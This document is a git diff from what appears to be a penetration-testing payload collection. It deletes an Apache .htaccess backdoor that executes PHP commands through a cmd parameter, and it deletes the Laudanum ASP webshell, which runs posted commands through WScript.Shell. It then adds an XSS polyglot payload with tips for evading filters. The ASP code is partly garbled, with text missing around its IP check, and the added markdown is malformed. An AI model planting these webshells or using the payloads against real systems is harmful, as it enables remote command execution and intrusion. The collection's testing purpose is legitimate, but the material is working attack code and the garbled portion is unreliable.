diff --git a/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell b/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell deleted file mode 100644 index 0b3b0682..00000000 --- a/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell +++ /dev/null @@ -1,23 +0,0 @@ -# htaccess backdoor shell -# this is relatively stealthy compared to a typical webshell - -# overriding deny rule -# making htaccess accessible from the internet -# without this you'll get a HTTP 403 - -Require all granted -Order allow,deny -Allow from all - - -# Make the server treat .htaccess file as .php file -AddType application/x-httpd-php .htaccess - -# - -# To execute commands you would navigate to: -# http://vulnerable.com/.htaccess?cmd=YourCommand - -# If system(); isnt working then try other syscalls -# e.g. passthru(); shell_exec(); etc -# If you still cant execute syscalls, try bypassing php.ini via htaccess diff --git a/Upload Insecure Files/Extension ASP/shell.asp b/Upload Insecure Files/Extension ASP/shell.asp deleted file mode 100644 index b2caf599..00000000 --- a/Upload Insecure Files/Extension ASP/shell.asp +++ /dev/null @@ -1,83 +0,0 @@ -<% -' ******************************************************************************* -' *** -' *** Laudanum Project -' *** A Collection of Injectable Files used during a Penetration Test -' *** -' *** More information is available at: -' *** http://laudanum.secureideas.net -' *** laudanum@secureideas.net -' *** -' *** Project Leads: -' *** Kevin Johnson -' *** -' *** Copyright 2012 by Kevin Johnson and the Laudanum Team -' *** -' ******************************************************************************** -' *** -' *** Updated and fixed by Robin Wood -' *** Updated and fixed by Tim Medin "1.2.3.4" then - response.Status="404 Page Not Found" - response.Write(response.Status) - response.End -end if - -if Request.Form("submit") <> "" then - Dim wshell, intReturn, strPResult - cmd = Request.Form("cmd") - Response.Write ("Running command: " & cmd & "
") - set wshell = CreateObject("WScript.Shell") - Set objCmd = wShell.Exec(cmd) - strPResult = objCmd.StdOut.Readall() - - response.write "
" & replace(replace(strPResult,"<","<"),vbCrLf,"
") & "
" - - set wshell = nothing -end if - -%> - -Laundanum ASP Shell - -
-Command:
- -

Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done. -

Example command to do a directory listing:
-%ComSpec% /c dir -

-
-
-Copyright © 2012, Kevin Johnson and the Laudanum team.
-Written by Tim Medin.
-Get the latest version at laudanum.secureideas.net. -
- - \ No newline at end of file diff --git a/XSS Injection/2 - XSS Polyglot.md b/XSS Injection/2 - XSS Polyglot.md index daa4a573..c83a6e62 100644 --- a/XSS Injection/2 - XSS Polyglot.md +++ b/XSS Injection/2 - XSS Polyglot.md @@ -84,3 +84,14 @@ A polyglot XSS is a type of cross-site scripting (XSS) payload designed to work * [Building XSS Polyglots - Brute - June 23, 2021](https://brutelogic.com.br/blog/building-xss-polyglots/) * [XSS Polyglot Challenge v2 - @filedescriptor - August 20, 2015](https://web.archive.org/web/20190617111911/https://polyglot.innerht.ml/) + + + jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1) )//%0D%0A%0d%0a//\x3csVg/\x3e + + # Advanced XSS Polyglot +This payload is designed to execute across numerous HTML/JS contexts and evade standard filters by mixing comment styles, breaking out of tags, and leveraging lowercase event handlers. Use cases include testing various input sanitization weaknesses and filters. + # Crafting Tips +- Mix encoding methods (URL, HTML entities, Unicode) to sneak past blacklists. +- Use HTML breaking elements (``, ``, etc.) to escape confined contexts. +- Leverage less common event handlers (e.g., `onauxclick`, `ontoggle`) for advanced bypasses. +